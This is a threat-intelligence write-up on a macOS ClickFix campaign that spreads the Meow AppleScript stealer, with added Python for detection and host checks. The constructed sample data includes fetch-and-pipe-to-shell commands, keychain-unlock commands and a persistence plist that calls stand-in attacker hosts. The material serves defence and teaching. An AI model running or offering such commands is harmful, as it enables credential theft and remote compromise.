macOS ClickFix AppleScript stealer diagram showing the Meow macOS stealer infection chain | Image: Netskope Threat Labs
At a Glance
- Malware Family: Meow macOS stealer (AppleScript-based infostealer and RAT)
- Threat Actor: Suspected Russian-speaking attacker
- Targets or Victims: macOS users in technology, media, and business sectors across Asia, North America, and Oceania
- Scale: 25 short-lived lure domains
- Jurisdiction or Status: Under active security investigation
- Source: Netskope Threat Labs
TL;DR
Netskope Threat Labs has documented a macOS ClickFix campaign, active since May 2026, that delivers an AppleScript-based infostealer with remote-access capability. The malware's primary targets are cryptocurrency wallets, but it also takes browser data and the victim's system password.
Fake troubleshooting websites trick victims into pasting a command into the Terminal. That command loads the AppleScript stealer directly into memory, where it phishes the user's macOS password, unlocks the login keychain, and replaces the executables of installed cryptocurrency wallet apps with trojanised versions.
Delivery
The campaign relies on lure websites. The attackers build fake macOS utility pages and GitHub repositories styled after trusted technology brands, and each page tells the visitor that an error has to be fixed manually by copying a command into the Terminal. Malicious JavaScript on the page rewrites the clipboard contents, so what the victim pastes is not the text shown on screen but the attacker's command. Running it starts a fileless chain: a hidden script fetches the Meow stealer payload and executes it from memory, so no initial file is written to the hard drive. Analysts at Microsoft Security recently observed similar tactics in which threat actors host malicious commands on popular blogging sites and target users searching for disk-optimisation advice. The landing page filters visitors by user agent so that only Mac users receive the AppleScript payload.
Infection Chain
The first-stage loader profiles the victim's environment. It checks the keyboard layout and exits immediately if a Russian layout is present, a filter that is consistent with the suspected Russian-speaking origin of the attackers. The loader then posts basic victim telemetry to a remote server and downloads the AppleScript payload, which is handed straight to the interpreter rather than written to disk. The script relies on native macOS tooling, a living-off-the-land approach that keeps it out of reach of many antivirus scanners. It then displays a fake system password prompt styled like a native macOS security alert; the dialog has no close button, so the only way to dismiss it is to type a password. The malware validates the entered password against the local directory service and, once it is confirmed, uses it to unlock the login keychain, which gives it access to the credentials and keys stored there.
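The two stages described in the Delivery and Infection Chain sections leave a recognisable shape in process telemetry. The Python below is an added example, not Netskope's code and not the malware's: it assumes an EDR or audit feed that records pid, ppid, start time, process name and command line; that the AppleScript stage runs through osascript; and that the password check and keychain unlock use dscl and security, which the write-up describes only as "native directory services" and "the login keychain". The event records are constructed, and the host name and password in them are placeholders.

```python
"""Flag the ClickFix fileless chain in process-creation events (added example)."""
from collections import defaultdict

# Assumption: events arrive as dicts with pid, ppid, ts (seconds), name, cmdline.
TERMINALS = {"Terminal", "iTerm2"}
FETCHERS = {"curl", "wget"}
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python3"}
# Assumption: the stealer validates the typed password with `dscl ... -authonly`
# and opens the keychain with `security unlock-keychain`.
CRED_MARKERS = ("-authonly", "unlock-keychain")


def _ancestors(by_pid, pid):
    """Return process names from pid upward along ppid links (pid included)."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return names


def _reads_stdin(e):
    """True when an interpreter was started with no script path, so its
    program arrives on stdin: exactly how `curl ... | osascript` feeds it."""
    return all(a.startswith("-") for a in e["cmdline"].split()[1:])


def detect_clickfix_chain(events, window=5.0):
    """Return sorted (pid, reason) pairs for both stages of the chain."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    alerts = []
    # Stage 1: under a terminal, a shell spawns a fetcher and, within a few
    # seconds, an interpreter that reads its program from stdin.
    for parent, kids in children.items():
        if parent not in by_pid or not TERMINALS & set(_ancestors(by_pid, parent)):
            continue
        fetches = [k for k in kids if k["name"] in FETCHERS]
        interps = [k for k in kids if k["name"] in INTERPRETERS and _reads_stdin(k)]
        for f in fetches:
            for i in interps:
                if abs(i["ts"] - f["ts"]) <= window:
                    alerts.append((i["pid"], f"{i['name']} fed from stdin beside {f['name']} under a terminal shell"))
    # Stage 2: osascript (the fake prompt) spawning the password check or the
    # keychain unlock.
    for e in events:
        if any(m in e["cmdline"] for m in CRED_MARKERS) and "osascript" in _ancestors(by_pid, e["ppid"]):
            alerts.append((e["pid"], "credential check spawned under osascript"))
    return sorted(alerts)


# Constructed sample telemetry (not a real capture).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "ts": 0.0,   "name": "Terminal",  "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 101, "ppid": 100, "ts": 1.0,   "name": "zsh",       "cmdline": "-zsh"},
    {"pid": 102, "ppid": 101, "ts": 30.0,  "name": "curl",      "cmdline": "curl -fsSL http://lure.example.invalid/fix.txt"},
    {"pid": 103, "ppid": 101, "ts": 30.0,  "name": "osascript", "cmdline": "osascript"},
    {"pid": 104, "ppid": 103, "ts": 45.0,  "name": "dscl",      "cmdline": "dscl /Local/Default -authonly alice hunter2"},
    {"pid": 105, "ppid": 103, "ts": 45.2,  "name": "security",  "cmdline": "security unlock-keychain -p hunter2 /Users/alice/Library/Keychains/login.keychain-db"},
    # Benign: a download saved to disk, and a new shell opened much later.
    {"pid": 200, "ppid": 101, "ts": 300.0, "name": "curl",      "cmdline": "curl -o /tmp/installer.pkg http://vendor.example.invalid/installer.pkg"},
    {"pid": 201, "ppid": 101, "ts": 400.0, "name": "bash",      "cmdline": "bash"},
]

if __name__ == "__main__":
    for pid, reason in detect_clickfix_chain(SAMPLE_EVENTS):
        print(pid, reason)
```

The stage-1 rule keys on the interpreter having no script argument rather than on the text of the pasted command, because a pipeline typed into an interactive shell never appears as a single command line: curl and osascript show up as siblings started at the same instant. The time window absorbs the case where the loader decodes a base64 blob first and only then starts the interpreter.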
Command-and-Control and Data-Exfiltration Behavior
The Meow macOS stealer copies data from twelve web browsers, targeting saved passwords, session cookies and form autofill data, and from more than one hundred browser extensions, with cryptocurrency wallet extensions singled out. It also tampers with desktop wallet software, specifically Exodus, Atomic Wallet, Ledger Live and Trezor Suite. For each one it downloads a modified application archive from the server, force-kills the running wallet process, replaces the application's core executable with the malicious version, and applies an ad-hoc code signature so that the replaced binary still launches without Gatekeeper warnings. The collected data is compressed and uploaded silently with curl, after which the local staging artifacts are deleted to remove forensic evidence. All command-and-control traffic runs over plain HTTP. A background process polls the server every sixty seconds for new commands, which gives the operator persistent remote access and lets the attacker push new shell code at any time.
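The sixty-second polling loop and the one-off curl upload are both visible from the network side without any host access. The Python below is an added example, not Netskope's code: it hunts for fixed-interval polling and large POST bodies in web proxy logs. The log layout, client address and host names are constructed for the example; only the plain-HTTP transport and the sixty-second interval come from the write-up.

```python
"""Find fixed-interval HTTP polling and bulk uploads in proxy logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Assumed log layout: "<iso-timestamp> <client> <method> <url> <status> <bytes>"
LINE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3}) (\d+)$")


def parse_proxy_log(lines):
    """Yield (timestamp, client, method, host, bytes) for well-formed lines."""
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, client, method, url, _status, size = m.groups()
        yield datetime.fromisoformat(ts), client, method, url.split("/")[2], int(size)


def find_beacons(lines, min_hits=5, max_jitter=0.10):
    """Return {(client, host): (hits, mean_gap_s)} for client/host pairs whose
    requests arrive at near-constant intervals. Jitter is pstdev/mean of the
    inter-request gaps: human browsing is bursty, a polling loop is not."""
    times = defaultdict(list)
    for ts, client, _method, host, _size in parse_proxy_log(lines):
        times[(client, host)].append(ts)
    beacons = {}
    for key, ts in times.items():
        if len(ts) < min_hits:
            continue
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mu = mean(gaps)
        if mu > 0 and pstdev(gaps) / mu <= max_jitter:
            beacons[key] = (len(ts), round(mu, 1))
    return beacons


def large_uploads(lines, threshold=1_000_000):
    """Return (client, host, bytes) for POST/PUT bodies above threshold, the
    shape of the stealer's single curl upload of the compressed archive."""
    return [(c, h, n) for _ts, c, m, h, n in parse_proxy_log(lines)
            if m in ("POST", "PUT") and n >= threshold]


# Constructed sample log (not a real capture): one upload, six polls a minute
# apart with a second or two of jitter, and ordinary browsing in between.
SAMPLE_LOG = """\
2026-05-12T08:59:00 10.0.0.5 POST http://c2.example.invalid/upload 200 27340210
2026-05-12T09:00:00 10.0.0.5 GET http://c2.example.invalid/cmd 200 0
2026-05-12T09:00:05 10.0.0.5 GET http://www.example.invalid/ 200 14321
2026-05-12T09:00:07 10.0.0.5 GET http://www.example.invalid/style.css 200 2210
2026-05-12T09:01:01 10.0.0.5 GET http://c2.example.invalid/cmd 200 0
2026-05-12T09:02:00 10.0.0.5 GET http://c2.example.invalid/cmd 200 0
2026-05-12T09:03:02 10.0.0.5 GET http://c2.example.invalid/cmd 200 0
2026-05-12T09:03:40 10.0.0.5 GET http://www.example.invalid/page2 200 9980
2026-05-12T09:04:00 10.0.0.5 GET http://c2.example.invalid/cmd 200 0
2026-05-12T09:05:01 10.0.0.5 GET http://c2.example.invalid/cmd 200 0
2026-05-12T09:12:00 10.0.0.5 GET http://www.example.invalid/page3 200 11002
2026-05-12T09:12:03 10.0.0.5 GET http://www.example.invalid/logo.png 200 30411
2026-05-12T09:12:10 10.0.0.9 GET http://www.example.invalid/ 200 14321
""".splitlines()

if __name__ == "__main__":
    print(find_beacons(SAMPLE_LOG))
    print(large_uploads(SAMPLE_LOG))
```

A poller that sleeps for a fixed interval drifts by the time each request takes, so the gaps are slightly over sixty seconds rather than exact; the jitter ratio tolerates that while still rejecting the browsing traffic to the second host, whose gaps range from two seconds to eight minutes.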
Targeted Data Types
Beyond browser data, the malware collects a wide range of personal information. It copies entire cryptocurrency wallet directories, which frequently hold unencrypted seed phrases, and steals active session tokens from Telegram and Discord, which let the operator take over those accounts without knowing a password. It reads the Apple Notes database directly and sweeps the Desktop folder for documents, descending up to three directory levels and matching selected extensions for text files, spreadsheets and credential databases. To keep the upload small and inconspicuous, it stops collecting once the gathered files reach thirty megabytes.
Defense or Detection Guidance
Security teams should block the known lure and command-and-control domains; the Netskope GitHub repository carries the full list of indicators. Monitor terminal activity for commands that fetch remote content and pipe it straight into an interpreter, the signature of a pasted ClickFix command, and remind staff never to paste commands from a website into a terminal window. On the host, check the launch agent and launch daemon folders for a property list named com.apple.accountsd: Apple's own accountsd agent is registered from the read-only system volume, so a copy in a user-writable launchd folder indicates a successful, persistent compromise. Where the malware has run, reinstall desktop cryptocurrency wallets from the vendors' official sources and treat every password, session cookie and seed phrase on the machine as exposed.
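Two of the host checks above can be scripted. The Python below is an added example, not Netskope's code or a vendor tool: it scans launchd folders for the com.apple.accountsd property list and classifies the text that `codesign -dvv` prints for a wallet app, since an ad-hoc signature (Signature=adhoc, no team identifier) is what the stealer leaves on a replaced binary. The plist contents and codesign transcripts are constructed so the script runs anywhere; the bundle identifier, vendor name and team ID are placeholders, not any wallet vendor's real values.

```python
"""Check for the stealer's launchd persistence and ad-hoc-signed wallets (added example)."""
import plistlib
import tempfile
from pathlib import Path

SUSPECT_LABEL = "com.apple.accountsd"
# Assumption: persistence is a launchd plist in a user-writable launchd folder.
# Apple's real accountsd agent lives under /System/Library, so a copy here
# cannot be Apple's.
LAUNCHD_DIRS = ("/Library/LaunchDaemons", "/Library/LaunchAgents",
                str(Path.home() / "Library" / "LaunchAgents"))


def scan_launchd(dirs=LAUNCHD_DIRS):
    """Return (plist_path, program) for every plist whose file name or Label
    is the suspect label."""
    hits = []
    for d in map(Path, dirs):
        if not d.is_dir():
            continue
        for p in d.glob("*.plist"):
            try:
                data = plistlib.loads(p.read_bytes())
            except Exception:          # malformed plist: still report by file name
                data = {}
            if p.stem == SUSPECT_LABEL or data.get("Label") == SUSPECT_LABEL:
                program = data.get("Program") or " ".join(data.get("ProgramArguments", []))
                hits.append((str(p), program))
    return hits


def assess_codesign(transcript):
    """Classify the text printed by `codesign -dvv <App>.app` as adhoc,
    signed (Developer ID chain present) or unsigned."""
    fields = {}
    for line in transcript.splitlines():
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip()
    if fields.get("Signature") == "adhoc" or fields.get("TeamIdentifier") == "not set":
        return "adhoc"
    if any(k.startswith("Authority") for k in fields):
        return "signed"
    return "unsigned"


# Constructed transcripts in the layout codesign prints (placeholder values).
ADHOC_TRANSCRIPT = """\
Executable=/Applications/Wallet.app/Contents/MacOS/Wallet
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=1234 flags=0x2(adhoc) hashes=30+7 location=embedded
Signature=adhoc
Info.plist entries=28
TeamIdentifier=not set
Sealed Resources version=2 rules=13 files=120
"""
SIGNED_TRANSCRIPT = """\
Executable=/Applications/Wallet.app/Contents/MacOS/Wallet
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Signature size=9010
Authority=Developer ID Application: Example Vendor (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ABCDE12345
Sealed Resources version=2 rules=13 files=120
"""


def demo_launchd_scan():
    """Build a throwaway launchd folder with one benign and one suspect plist
    (both constructed) and scan it, so the check can be exercised off-box."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "com.example.updater.plist").write_bytes(plistlib.dumps(
            {"Label": "com.example.updater", "ProgramArguments": ["/usr/local/bin/updater"]}))
        (d / "com.apple.accountsd.plist").write_bytes(plistlib.dumps(
            {"Label": SUSPECT_LABEL, "RunAtLoad": True,
             "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://c2.example.invalid/cmd | sh"]}))
        return [(Path(p).name, prog) for p, prog in scan_launchd([tmp])]


if __name__ == "__main__":
    print(scan_launchd())                       # live scan of this machine's folders
    print(demo_launchd_scan())                  # constructed demonstration
    print(assess_codesign(ADHOC_TRANSCRIPT), assess_codesign(SIGNED_TRANSCRIPT))
```

On a real Mac, feed `assess_codesign` the output of `codesign -dvv /Applications/<Wallet>.app 2>&1` for each of the four named wallets; an "adhoc" verdict on an app that shipped Developer ID signed is sufficient reason to reinstall it from the vendor.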